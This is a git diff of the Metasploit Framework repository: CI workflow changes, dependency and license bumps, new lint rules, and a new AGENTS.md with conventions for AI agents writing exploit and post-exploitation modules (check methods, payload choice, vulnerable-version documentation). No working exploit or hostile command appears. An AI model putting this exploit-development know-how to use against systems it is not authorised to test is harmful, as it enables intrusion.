| 06633cf7f4 | |||
| 42d5d6a9f0 | |||
| 1053ae5c85 | |||
| a8a741fdc8 | |||
| 22b63aab29 | |||
| 7ea76977ae | |||
| 58fc79d4f5 | |||
| 9459571bc2 | |||
| 4cc546d363 | |||
| b2bb97828d | |||
| 6a3c899e62 | |||
| 1b5d698458 | |||
| 3477ec7a9d | |||
| d6d21bf188 | |||
| 64663afe9e | |||
| b729b8c91e | |||
| d9d882c637 | |||
| affabf3c55 | |||
| 8ddf3de41e | |||
| 822227ddf2 | |||
| 08ce855fa9 | |||
| c08a86fa0a | |||
| 1d9ecc89c6 | |||
| 1e98e1b932 | |||
| 31d7e424c0 | |||
| 648a3465b2 | |||
| 3a43678808 | |||
| 62446b9446 | |||
| cdf19a1397 | |||
| ae4fa52afe | |||
| d95c30467e | |||
| 1860507850 | |||
| 0802ef9adc | |||
| 6598e151b7 | |||
| 033a2358f8 | |||
| cc898a7aa7 | |||
| 961e7faa33 | |||
| 6b50556bfa | |||
| 1db6b0cb59 | |||
| 1afdbd683a | |||
| b3988aabf5 | |||
| e1f6fafb2a | |||
| f35497f4b4 | |||
| afd9ac3974 | |||
| acc035cabd | |||
| ae8ab28eed | |||
| d7d7a318ed | |||
| d2c192e9bf | |||
| cb7dd50731 | |||
| f6fdbc4fbd | |||
| beff06b9a4 | |||
| c485d9a822 | |||
| 4a3a26e9d9 | |||
| 9d120c1eeb | |||
| 7017273a84 | |||
| 47c47df0bb | |||
| e778f40055 | |||
| c225256956 | |||
| 475846ea2a | |||
| 102ef677b1 | |||
| 0a5cccf5e6 | |||
| e97c23ca16 | |||
| 8838733f97 | |||
| a44fe6f992 | |||
| 3fc047db5d | |||
| 2927050056 | |||
| 8a2df64987 | |||
| 49d68e0991 | |||
| 8589d7cc40 | |||
| f4a3e67b0c | |||
| 6e89c9bced | |||
| 461ad3e0e2 | |||
| d1cdf21551 | |||
| 732ca0752b | |||
| d2e470f8c2 | |||
| 046c1338e2 | |||
| 7627bd177e | |||
| e7e40d3eeb | |||
| fb3b4c1f2d | |||
| 02c5abf9c3 | |||
| 437dbd962f | |||
| 3d942168fe | |||
| 58ac914821 | |||
| 1621d4f756 | |||
| 4fd97d5d0c | |||
| 7cdcace837 | |||
| 9a5670b8f1 | |||
| f06cff951a | |||
| 705a346b43 | |||
| f126885f91 | |||
| e9a7abaac7 | |||
| 4e64a0a8e5 |
@@ -0,0 +1,3 @@
|
||||
# Copilot Instructions
|
||||
|
||||
Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
|
||||
@@ -62,3 +62,7 @@ jobs:
|
||||
ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
|
||||
ls -la ./.git/hooks
|
||||
./.git/hooks/post-merge
|
||||
|
||||
- name: Verify encoding
|
||||
run: |
|
||||
bundle exec ruby tools/dev/verify_encoding.rb
|
||||
|
||||
@@ -12,9 +12,37 @@ on:
|
||||
required: false
|
||||
default: "[]"
|
||||
type: string
|
||||
additional_rails_versions:
|
||||
description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
|
||||
required: false
|
||||
default: "[]"
|
||||
type: string
|
||||
# Caller example:
|
||||
# with:
|
||||
# additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
|
||||
|
||||
jobs:
|
||||
prepare_matrix:
|
||||
runs-on: ubuntu-latest
|
||||
outputs:
|
||||
rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
|
||||
steps:
|
||||
- name: Build Rails version matrix
|
||||
id: merge_rails_versions
|
||||
run: |
|
||||
default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
|
||||
additional_rails_versions='${{ inputs.additional_rails_versions }}'
|
||||
|
||||
rails_versions=$(jq -cn \
|
||||
--argjson defaults "$default_rails_versions" \
|
||||
--argjson extras "$additional_rails_versions" \
|
||||
'$defaults + $extras | unique')
|
||||
|
||||
echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
|
||||
shell: bash
|
||||
|
||||
test:
|
||||
needs: prepare_matrix
|
||||
runs-on: ${{ matrix.os }}
|
||||
timeout-minutes: 40
|
||||
|
||||
@@ -25,18 +53,16 @@ jobs:
|
||||
- '3.2'
|
||||
- '3.3'
|
||||
- '3.4'
|
||||
rails:
|
||||
- '~> 7.0.0'
|
||||
- '~> 7.1.0'
|
||||
- '~> 7.2.0'
|
||||
rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
|
||||
postgres:
|
||||
- '9.6'
|
||||
- '14.19'
|
||||
- '16.8'
|
||||
os:
|
||||
- ubuntu-latest
|
||||
|
||||
env:
|
||||
RAILS_ENV: test
|
||||
RAILS_VERSION: ${{ matrix.rails }}
|
||||
|
||||
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
|
||||
steps:
|
||||
|
||||
@@ -112,8 +112,18 @@ jobs:
|
||||
if: runner.os == 'Linux'
|
||||
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
|
||||
|
||||
- uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
|
||||
if: ${{ matrix.meterpreter.name == 'php' }}
|
||||
# Use setup-php@2.31.1 for Windows (PHP 5.3 on windows-2022 is broken with later versions while PHP 7.4 and 8.3
|
||||
# are broken on MacOS with this version)
|
||||
- name: Use setup-php@2.31.1 to install PHP for Windows runners
|
||||
uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
|
||||
if: ${{ matrix.meterpreter.name == 'php' && runner.os == 'Windows' }}
|
||||
with:
|
||||
php-version: ${{ matrix.meterpreter.runtime_version }}
|
||||
tools: none
|
||||
|
||||
- name: Use setup-php@2.37.0 to install PHP for non-Windows runners
|
||||
uses: shivammathur/setup-php@accd6127cb78bee3e8082180cb391013d204ef9f
|
||||
if: ${{ matrix.meterpreter.name == 'php' && runner.os != 'Windows' }}
|
||||
with:
|
||||
php-version: ${{ matrix.meterpreter.runtime_version }}
|
||||
tools: none
|
||||
@@ -274,21 +284,21 @@ jobs:
|
||||
run: |
|
||||
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
|
||||
dir
|
||||
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
|
||||
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
|
||||
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
|
||||
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
|
||||
if ($process.ExitCode -eq 0) {
|
||||
Write-Host "components have been successfully added"
|
||||
} else {
|
||||
Write-Host "components were not installed"
|
||||
exit 1
|
||||
}
|
||||
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
|
||||
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
|
||||
Write-Host $r
|
||||
$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
|
||||
Write-Host $r
|
||||
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
|
||||
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
|
||||
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
|
||||
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
|
||||
# if ($process.ExitCode -eq 0) {
|
||||
# Write-Host "components have been successfully added"
|
||||
# } else {
|
||||
# Write-Host "components were not installed"
|
||||
# exit 1
|
||||
# }
|
||||
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
|
||||
# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
|
||||
# Write-Host $r
|
||||
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
|
||||
# Write-Host $r
|
||||
working-directory: metasploit-payloads
|
||||
|
||||
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
|
||||
|
||||
@@ -0,0 +1,12 @@
|
||||
---
|
||||
inclusion: always
|
||||
---
|
||||
|
||||
# Metasploit Framework — Kiro Steering
|
||||
|
||||
Follow the project's AI agent instructions and coding conventions defined in the repository root.
|
||||
|
||||
## References
|
||||
- AI agent instructions: #[[file:AGENTS.md]]
|
||||
- Contributing guide: #[[file:CONTRIBUTING.md]]
|
||||
- RuboCop config: #[[file:.rubocop.yml]]
|
||||
@@ -25,6 +25,8 @@ require:
|
||||
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
|
||||
- ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
|
||||
- ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
|
||||
- ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
|
||||
- ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
|
||||
|
||||
Layout/SpaceBeforeBrackets:
|
||||
Enabled: true
|
||||
@@ -683,3 +685,14 @@ Lint/DetectOutdatedCmdExecApi:
|
||||
Detects outdated usage of cmd_exec with separate arguments.
|
||||
Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
|
||||
Enabled: true
|
||||
|
||||
Lint/BareCheckCodeInNonExploit:
|
||||
Description: >-
|
||||
Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
|
||||
Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
|
||||
because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
|
||||
Enabled: true
|
||||
Include:
|
||||
- 'modules/auxiliary/**/*'
|
||||
- 'modules/post/**/*'
|
||||
- 'modules/evasion/**/*'
|
||||
|
||||
@@ -0,0 +1,122 @@
|
||||
# AI Agent Instructions for Metasploit Framework
|
||||
|
||||
## Project Overview
|
||||
|
||||
Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
|
||||
|
||||
## Project Structure
|
||||
|
||||
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
|
||||
- `lib/msf/` — Core framework library code
|
||||
- `lib/rex/` — Rex (Ruby Exploitation) library
|
||||
- `lib/metasploit/` — Metasploit namespace libraries
|
||||
- `data/` — Data files used by modules (wordlists, templates, binaries)
|
||||
- `spec/` — RSpec test suite
|
||||
- `tools/` — Developer and operational tools
|
||||
- `plugins/` — msfconsole plugins
|
||||
- `scripts/` — Example automation scripts
|
||||
|
||||
## Coding Conventions
|
||||
|
||||
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
|
||||
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
|
||||
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
|
||||
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
|
||||
- No enforced line length limit, but keep code readable
|
||||
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
|
||||
- Multiline block comments are acceptable for embedded code snippets/payloads
|
||||
- Don't use `get_`/`set_` prefixes for accessor methods in new code
|
||||
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
|
||||
|
||||
### Module Development
|
||||
|
||||
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
|
||||
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
|
||||
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
|
||||
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
|
||||
- Exploits require a `DisclosureDate` field
|
||||
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
|
||||
- Use the module mixin APIs — don't reinvent the wheel
|
||||
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
|
||||
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
|
||||
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
|
||||
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
|
||||
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
|
||||
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
|
||||
- `report_service` method called when a service can be reported
|
||||
- `report_vuln` method called when a vuln can be reported
|
||||
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
|
||||
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
|
||||
- If there's only one `ACTION` in the exploit, it can likely be omitted.
|
||||
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
|
||||
- All `print_*` calls should start with a capital
|
||||
- when opening a file, make sure the file exists first
|
||||
- when checking for a string in a response - will it always be in english?
|
||||
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
|
||||
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
|
||||
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. don’t use a cmd stager and only allow curl/wget).
|
||||
- Define bad characters instead of explicitly base-64 encoding payloads
|
||||
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
|
||||
- Don’t check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
|
||||
- Don’t submit any kind of opaque binary blob, everything must include source code and build instructions
|
||||
- Don’t print host information like `#{ip}:#{port}` because it doesn’t handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
|
||||
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
|
||||
|
||||
### Check Methods
|
||||
|
||||
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
|
||||
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
|
||||
- Prefer using `Rex::Version` for version checks
|
||||
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
|
||||
- `get_version` methods should return a REX version
|
||||
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
|
||||
- `CheckCode::Appears` is only used when the application's versions has been checked`
|
||||
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
|
||||
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
|
||||
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
|
||||
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
|
||||
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
|
||||
|
||||
### Library Code
|
||||
|
||||
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
|
||||
- Write RSpec tests for any library changes
|
||||
- Follow [Better Specs](http://www.betterspecs.org/) conventions
|
||||
- Write YARD documentation for public methods
|
||||
- Keep PRs focused — small fixes are easier to review
|
||||
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
|
||||
|
||||
### Testing
|
||||
|
||||
- Tests live in `spec/` mirroring the `lib/` structure
|
||||
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
|
||||
|
||||
### Preferred Libraries
|
||||
|
||||
- Use the `RubySMB` library for SMB modules
|
||||
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
|
||||
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
|
||||
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
|
||||
|
||||
## Common Patterns
|
||||
|
||||
- Register options with `register_options` and `register_advanced_options`
|
||||
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
|
||||
- Use `datastore['OPTION_NAME']` to access module options
|
||||
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
|
||||
- Use `vprint_*` variants for verbose-only output
|
||||
- Use `send_request_cgi` for HTTP requests in modules
|
||||
- Use `connect` / `disconnect` for TCP socket operations
|
||||
|
||||
## Before Submitting
|
||||
|
||||
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
|
||||
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
|
||||
|
||||
## What NOT to Do
|
||||
|
||||
- Don't submit untested code — all code must be manually verified
|
||||
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
|
||||
- Don't include more than one module per pull request
|
||||
- Don't add new scripts to `scripts/` — use post modules instead
|
||||
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
|
||||
+1
-1
@@ -15,7 +15,7 @@ Before we get into the details of contributing code, you should know there are m
|
||||
|
||||
|
||||
## Code Contributions
|
||||
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
|
||||
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
|
||||
|
||||
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
|
||||
|
||||
|
||||
@@ -53,5 +53,7 @@ group :test do
|
||||
gem 'allure-rspec'
|
||||
# Manipulate Time.now in specs
|
||||
gem 'timecop'
|
||||
# stub and set expectations on HTTP requests
|
||||
gem 'webmock', '~> 3.18'
|
||||
end
|
||||
|
||||
|
||||
+34
-19
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (6.4.114)
|
||||
metasploit-framework (6.4.132)
|
||||
aarch64
|
||||
abbrev
|
||||
actionpack (~> 7.2.0)
|
||||
@@ -42,12 +42,13 @@ PATH
|
||||
jsobfu
|
||||
json
|
||||
lru_redux
|
||||
mcp (= 0.13.0)
|
||||
metasm
|
||||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-credential (>= 6.0.21)
|
||||
metasploit-model
|
||||
metasploit-payloads (= 2.0.240)
|
||||
metasploit_data_models (>= 6.0.7)
|
||||
metasploit-payloads (= 2.0.245)
|
||||
metasploit_data_models (>= 6.0.15)
|
||||
metasploit_payloads-mettle (= 1.0.46)
|
||||
mqtt
|
||||
msgpack (~> 1.6.0)
|
||||
@@ -102,7 +103,7 @@ PATH
|
||||
rinda
|
||||
ruby-macho
|
||||
ruby-mysql
|
||||
ruby_smb (~> 3.3.15)
|
||||
ruby_smb (~> 3.3.17)
|
||||
rubyntlm
|
||||
rubyzip
|
||||
sinatra (~> 3.2)
|
||||
@@ -211,7 +212,7 @@ GEM
|
||||
bcrypt (3.1.20)
|
||||
bcrypt_pbkdf (1.1.1)
|
||||
benchmark (0.4.1)
|
||||
bigdecimal (3.2.3)
|
||||
bigdecimal (3.3.1)
|
||||
bindata (2.4.15)
|
||||
bootsnap (1.18.4)
|
||||
msgpack (~> 1.2)
|
||||
@@ -223,6 +224,9 @@ GEM
|
||||
concurrent-ruby (1.3.5)
|
||||
connection_pool (2.5.4)
|
||||
cookiejar (0.3.4)
|
||||
crack (1.0.1)
|
||||
bigdecimal
|
||||
rexml
|
||||
crass (1.0.6)
|
||||
csv (3.3.2)
|
||||
daemons (1.4.1)
|
||||
@@ -281,6 +285,7 @@ GEM
|
||||
gyoku (1.4.0)
|
||||
builder (>= 2.1.2)
|
||||
rexml (~> 3.0)
|
||||
hashdiff (1.2.1)
|
||||
hashery (2.1.2)
|
||||
hrr_rb_ssh (0.4.2)
|
||||
hrr_rb_ssh-ed25519 (0.4.2)
|
||||
@@ -304,6 +309,9 @@ GEM
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.15.1)
|
||||
json-schema (6.2.0)
|
||||
addressable (~> 2.8)
|
||||
bigdecimal (>= 3.1, < 5)
|
||||
language_server-protocol (3.17.0.5)
|
||||
license_finder (5.11.1)
|
||||
bundler
|
||||
@@ -322,6 +330,8 @@ GEM
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.12.0)
|
||||
lru_redux (1.1.0)
|
||||
mcp (0.13.0)
|
||||
json-schema (>= 4.1)
|
||||
memory_profiler (1.1.0)
|
||||
metasm (1.0.5)
|
||||
metasploit-concern (5.0.5)
|
||||
@@ -331,7 +341,7 @@ GEM
|
||||
mutex_m
|
||||
railties (~> 7.0)
|
||||
zeitwerk
|
||||
metasploit-credential (6.0.20)
|
||||
metasploit-credential (6.0.23)
|
||||
bigdecimal
|
||||
csv
|
||||
drb
|
||||
@@ -352,18 +362,18 @@ GEM
|
||||
drb
|
||||
mutex_m
|
||||
railties (~> 7.0)
|
||||
metasploit-payloads (2.0.240)
|
||||
metasploit_data_models (6.0.12)
|
||||
activerecord (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
metasploit-payloads (2.0.245)
|
||||
metasploit_data_models (6.0.18)
|
||||
activerecord (>= 7.0, < 8.1)
|
||||
activesupport (>= 7.0, < 8.1)
|
||||
arel-helpers
|
||||
bigdecimal
|
||||
drb
|
||||
metasploit-concern
|
||||
metasploit-model (~> 5.0.4)
|
||||
metasploit-model (>= 5.0.4)
|
||||
mutex_m
|
||||
pg
|
||||
railties (~> 7.0)
|
||||
railties (>= 7.0, < 8.1)
|
||||
recog
|
||||
webrick
|
||||
metasploit_payloads-mettle (1.0.46)
|
||||
@@ -491,14 +501,14 @@ GEM
|
||||
netrc (~> 0.8)
|
||||
rex-arch (0.1.19)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.10)
|
||||
rex-bin_tools (0.1.16)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-core
|
||||
rex-struct2
|
||||
rex-text
|
||||
rex-core (0.1.35)
|
||||
rex-encoder (0.1.8)
|
||||
rex-core (0.1.36)
|
||||
rex-encoder (0.1.10)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
@@ -531,7 +541,7 @@ GEM
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.64)
|
||||
rex-socket (0.1.65)
|
||||
dnsruby
|
||||
rex-core
|
||||
rex-sslscan (0.1.13)
|
||||
@@ -539,7 +549,7 @@ GEM
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.5)
|
||||
rex-text (0.2.61)
|
||||
rex-text (0.2.62)
|
||||
bigdecimal
|
||||
rex-zip (0.1.6)
|
||||
rex-text
|
||||
@@ -593,7 +603,7 @@ GEM
|
||||
ruby-progressbar (1.13.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby2_keywords (0.0.5)
|
||||
ruby_smb (3.3.15)
|
||||
ruby_smb (3.3.17)
|
||||
bindata (= 2.4.15)
|
||||
openssl-ccm
|
||||
openssl-cmac
|
||||
@@ -649,6 +659,10 @@ GEM
|
||||
useragent (0.16.11)
|
||||
warden (1.2.9)
|
||||
rack (>= 2.0.9)
|
||||
webmock (3.26.2)
|
||||
addressable (>= 2.8.0)
|
||||
crack (>= 0.3.2)
|
||||
hashdiff (>= 0.4.0, < 2.0.0)
|
||||
webrick (1.9.1)
|
||||
websocket-driver (0.7.7)
|
||||
base64
|
||||
@@ -699,6 +713,7 @@ DEPENDENCIES
|
||||
simplecov (= 0.18.2)
|
||||
test-prof
|
||||
timecop
|
||||
webmock (~> 3.18)
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
|
||||
+14
-9
@@ -27,7 +27,7 @@ base64, 0.3.0, "ruby, Simplified BSD"
|
||||
bcrypt, 3.1.20, MIT
|
||||
bcrypt_pbkdf, 1.1.1, MIT
|
||||
benchmark, 0.4.1, "ruby, Simplified BSD"
|
||||
bigdecimal, 3.2.3, "ruby, Simplified BSD"
|
||||
bigdecimal, 3.3.1, "ruby, Simplified BSD"
|
||||
bindata, 2.4.15, "Simplified BSD"
|
||||
bootsnap, 1.18.4, MIT
|
||||
bson, 5.1.1, "Apache 2.0"
|
||||
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
|
||||
concurrent-ruby, 1.3.5, MIT
|
||||
connection_pool, 2.5.4, MIT
|
||||
cookiejar, 0.3.4, "Simplified BSD"
|
||||
crack, 1.0.1, MIT
|
||||
crass, 1.0.6, MIT
|
||||
csv, 3.3.2, "ruby, Simplified BSD"
|
||||
daemons, 1.4.1, MIT
|
||||
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
|
||||
getoptlong, 0.2.1, "ruby, Simplified BSD"
|
||||
gssapi, 1.3.1, MIT
|
||||
gyoku, 1.4.0, MIT
|
||||
hashdiff, 1.2.1, MIT
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
hrr_rb_ssh, 0.4.2, "Apache 2.0"
|
||||
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
|
||||
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
|
||||
jmespath, 1.6.2, "Apache 2.0"
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.15.1, ruby
|
||||
json-schema, 6.2.0, MIT
|
||||
language_server-protocol, 3.17.0.5, MIT
|
||||
license_finder, 5.11.1, MIT
|
||||
lint_roller, 1.1.0, MIT
|
||||
@@ -93,14 +96,15 @@ logger, 1.7.0, "ruby, Simplified BSD"
|
||||
logging, 2.4.0, MIT
|
||||
loofah, 2.24.1, MIT
|
||||
lru_redux, 1.1.0, MIT
|
||||
mcp, 0.13.0, "Apache 2.0"
|
||||
memory_profiler, 1.1.0, MIT
|
||||
metasm, 1.0.5, LGPL-2.1
|
||||
metasploit-concern, 5.0.5, "New BSD"
|
||||
metasploit-credential, 6.0.20, "New BSD"
|
||||
metasploit-framework, 6.4.114, "New BSD"
|
||||
metasploit-credential, 6.0.21, "New BSD"
|
||||
metasploit-framework, 6.4.132, "New BSD"
|
||||
metasploit-model, 5.0.4, "New BSD"
|
||||
metasploit-payloads, 2.0.240, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.12, "New BSD"
|
||||
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.18, "New BSD"
|
||||
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.1.0, MIT
|
||||
mime-types, 3.7.0, MIT
|
||||
@@ -167,8 +171,8 @@ reline, 0.6.2, ruby
|
||||
require_all, 3.0.0, MIT
|
||||
rest-client, 2.1.0, MIT
|
||||
rex-arch, 0.1.19, "New BSD"
|
||||
rex-bin_tools, 0.1.10, "New BSD"
|
||||
rex-core, 0.1.35, "New BSD"
|
||||
rex-bin_tools, 0.1.16, "New BSD"
|
||||
rex-core, 0.1.36, "New BSD"
|
||||
rex-encoder, 0.1.8, "New BSD"
|
||||
rex-exploitation, 0.1.44, "New BSD"
|
||||
rex-java, 0.1.8, "New BSD"
|
||||
@@ -182,7 +186,7 @@ rex-rop_builder, 0.1.6, "New BSD"
|
||||
rex-socket, 0.1.64, "New BSD"
|
||||
rex-sslscan, 0.1.13, "New BSD"
|
||||
rex-struct2, 0.1.5, "New BSD"
|
||||
rex-text, 0.2.61, "New BSD"
|
||||
rex-text, 0.2.62, "New BSD"
|
||||
rex-zip, 0.1.6, "New BSD"
|
||||
rexml, 3.4.1, "Simplified BSD"
|
||||
rinda, 0.2.0, "ruby, Simplified BSD"
|
||||
@@ -202,7 +206,7 @@ ruby-prof, 1.7.2, "Simplified BSD"
|
||||
